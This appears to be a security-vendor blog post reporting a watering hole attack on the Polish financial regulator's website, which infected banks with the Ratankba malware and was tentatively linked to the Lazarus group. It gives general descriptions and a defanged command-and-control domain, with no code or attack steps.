Banks and financial institutions in over 30 countries worldwide have been targeted by a new malware in a new round of watering hole attack, as per recent reports. (Watering hole attacks, it much be remembered, are attacks in which the hacker infects with malware the website(s) that the victim, often a group or organization, frequently uses. As a result of this, some member of the target group or organization eventually gets infected with the same malware).
Reports say that this malware that has been targeting banks and financial organizations has been active at least since October last. The first time the malware attack was detected was when a bank in Poland found the malware on its system.
A recent report in a local Polish news website said that several Polish banks have detected the presence of suspicious files and also the instances of encrypted traffic going to some foreign IPs. Investigations held by the banks led to the discovery that the source of infection was the official website of the Polish Financial Supervision Authority (KNF), the Polish financial sector regulatory body. The KNF website had been compromised by some hacker(s) who had modified one of the JavaScript files on the website. It was this malicious JavaScript file that did the mischief.
As per reports, no funds were found to be stolen from accounts. Researchers analyzing the malware say that this hacking campaign, which comprises of a trojan horse that delivers malicious files to systems, aims at using the infected sites to redirect victims to a customized exploit kit. This exploit kit is coded to infect 150 IP addresses in 31 countries. These IPs include those of banks, telecoms, internet firms etc.
Hackers today are getting more and more sophisticated. The traditional antivirus program or just the basic system security software won’t do to combat the host of advanced malware that’s out to thwart security of organizations and companies. This new malware that’s out targeting banks and financial institutions seems to be one such sophisticated malware. Researchers have found that certain code strings in this malware, which they call the Ratankba malware, has some similarities to the code in the malware that has been used by the North Korean group Lazarus. This new malware connects with eye-watch[.]in for command-and-control communications and then downloads a Hacktool.
Researchers have the opinion that if it’s a group that Lazarus that’s behind this, they definitely have effected a shift in their techniques and targets and hence would mean increased sophistication. So, those on the look out for just an antivirus program or the best virus scanner to protect systems/networks need to be aware that combating malware is no longer that easy. You got to get more sophisticated to beat the sophisticated hackers and their advanced malware threats! Luckily corporate users today are becoming more vigilant and more educated on such matters.
————————————————————————————————————————————————–
Related Resources:
https://antivirus.comodo.com/blog/computer-safety/five-best-virus-and-malware-removal-tools/